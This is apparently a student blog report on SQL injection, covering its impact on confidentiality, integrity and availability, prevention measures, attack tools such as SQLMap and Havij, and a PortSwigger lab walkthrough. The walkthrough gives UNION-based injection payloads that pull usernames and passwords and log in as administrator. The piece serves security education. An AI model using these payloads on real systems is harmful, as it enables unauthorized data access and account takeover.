SQL Injection

What is SQL injection

“SQL injection is a technique for exploiting web applications that use client supplied data in SQL queries”. (Spett, no date:1) SQL injection involves injecting malicious SQL code into web application input fields or parameters, aiming to manipulate SQL statements and gain unauthorized database access. Exploiting vulnerabilities in input validation and insufficient data sanitization, attackers can bypass authentication, retrieve sensitive data, modify records, and execute commands on the database server.

“This vulnerability affects the main aspects of security i.e. CIA triad” (Rai et al., 2021:2) by exploiting SQL injection vulnerabilities, attackers can compromise the confidentiality, integrity, and availability of databases and the systems that rely on them. “SQL queries are used to execute commands, such as data retrieval, updates, and record removal.” (Online: 2019) therefore it is essential to implement preventive measures and security best practices to mitigate the risk of SQL injection and protect the CIA triad.

How Can SQL Injections Affect A Company (CIA TRIAD)

Confidentiality: Within SQL injection attacks, attackers directly exploit vulnerabilities to inject malicious SQL this vulnerability occurs when “an attacker inputs malicious strings as parameters in legitimate SQL statement” (Alazab et al., no date:2) code which allows a bypass in security measures therefore obtain hidden data. This severe vulnerability will acquire major issues as it can breach data protection legislations and cause severe fines by the GDPA and the ICO alongside any civil lawsuits due to exposing confidential information and compromising system integrity.

Integrity: SQL injection “generally allows an attacker to view data that they are not normally able to retrieve.” (PortSwigger: 2019) this aspect acquires a serious potential risk to compromise data integrity by allowing attackers to manipulate or modify information within databases. They acquire an ability to insert, update, or delete records, thereby jeopardizing the accuracy and reliability of the data. Protecting against SQL injection involves implementing robust security measures and regularly assessing vulnerabilities to maintain the integrity of critical data.

Availability: SQL injection attacks acquires a potentiality to disrupt the availability of a database or the entire application entity. When “an attacker inputs malicious strings as parameters in legitimate SQL statement” (Alazab et al., no date:2) a high probability occurs that may cause database crashes, denial-of-service (DoS) situations, or render the application unavailable to legitimate users, therefore having serious effects towards an organisation alongside customer trust.

How To Prevent And Mitigate SQL Injection Attacks

“To mitigate SQL Injection attacks. Some of those standards are ISO-27002” (Silva et al., 2020) developers should use secure coding practices like parameterized queries or prepared statements. These techniques separate SQL code from user inputs. Implementing input validation and sanitization filters and validates user inputs, ensuring they are free from malicious SQL code.

An important aspect to consider is “SQL Injection attack is pretty easy but will often become more complex with trickier targets” therefore a vital aspect would be to perform (Chuck 2022) regular security assessments, including penetration testing and code reviews, aid in identifying and mitigating SQL injection vulnerabilities. By proactively addressing these issues, organizations can enhance web application security and defend against SQL injection attacks.

The “Severity of SQL Injection attacks is limited by the attacker’s skill and imagination, and to a lesser extent” (kingthorin no date) Skilled attackers can gain unauthorized access, manipulate data, and execute commands. However, implementing security measures like input validation and secure coding practices reduces the risk and impact of SQL injection. Organizations should proactively assess vulnerabilities and maintain a strong security posture to mitigate the risk of SQL injection attacks.

The SQL injection threat model involves the exploitation of vulnerabilities in a web application's handling of user input in SQL queries. Understanding the SQL injection threat model helps organizations implement preventive measures and enhance the security of their web applications.

Tools to Utilise For SQL Injection

SQLMap: An open source tool designed for a purpose to complete SQL injections and database takeover. “SQLmap penetration testing tool automates the process of detecting and exploiting SQL injection”  (Rankothge et al., 2020:2) vulnerabilities.

Burp Suite: A vital comprehensive web application security testing tool that provides functionalities to detect and exploit SQL injection vulnerabilities, because “SQL injections affect an access level of web-applications” (Yousaf et al., 2012:2).

Havij: A commercial tool that enables automated SQL injection attacks, including extracting information from databases and gaining unauthorized access.

SQLNinja: An open-source tool used for exploiting SQL injection flaws in web applications. It can gain unauthorized access, execute commands, and extract sensitive data from databases.

SQL Power Injector: A lightweight SQL injection tool that allows for testing and exploiting SQL injection vulnerabilities in web applications.

An important aspect to understand is that while these tools can be utilised for testing and identifying vital vulnerabilities, their specific utilisation for malicious purposes is strictly illegal and unethical. Organizations should prioritize implementing robust security measures alongside providing necessary policies, training and guidelines for the employees for the best business practices.

LAB: SQL Injection UNION Attack - Retrieving Multiple Values In A Single Column

DISCLAIMER: Please click on the images to view them clearly!

I will be completing the lab from PortSwigger called SQL injection union attack, retrieving multiple values in a single column. The aim of this lab is to complete an SQL injection union attack where we use a payload to retrieve usernames and passwords from a table.

To start we must go onto the http history in burp suite, when we click onto the accessories tab on the website we can see that it comes onto the request tab. This is great because it allows us the ability to inject sql code into the url.

After doing this we must send the data to the repeater to allow us to modify the url and test different sql payloads in order to find one that can properly exploit the website.

The first payload we are going to test is the "‘+UNION+SELECT+NULL –" command. This is just to test what type of parameters the url accepts. From the response we get a HTTP 500 interal server error which means that we have to add another parameter.

After adding a second parameter of “NULL” onto the end of our payload and sending it through the repeater we can see that we get a HTTP 200 OK response which shows that the url must take two parameters. This must mean that there are two columns in the table we are attacking.

After changing the first NULL parameter to ‘abc’ and sending it through the repeater, we can see that we received an HTTP 500 internal sever error again. This is because the first column in the table we are attacking must not contain text. If we received a HTTP 200 OK response it would have shown that there is text in the first column of the table.

This time we set the first parameter to NULL and the second parameter to ‘abc’ to check if the second column in the table can take alphabetical values and once sending it through, we receive a HTTP 200 OK response. This means that the second column of the table can contain text.

Next we input the payload code “username||’~’||password+FROM+users” into the second parameter and we send the request through the repeater. After doing this we receive a HTTP 200 OK response which means our payload has been successfully executed.

When we scroll down on the response we can see the administrators password and a list of other users passwords. We can use these passwords to log into the accounts of the users and access their data.

Finally we can head to the login page and input “administrator” as the username and copy and paste the password code from the response received by the repeater. After doing so, we will have access to the administrator account and will have solved the lab!

Video Demonstration on How SQL Injection Works

Conclusion

In summary, SQL injection presents a grave risk to web applications, enabling unauthorized access, data manipulation, and potential compromise of sensitive information. Mitigating this threat necessitates the implementation of effective security measures, including input validation and secure coding practices. Regular security assessments and staying informed about emerging threats are vital for maintaining a strong defense against this widespread vulnerability.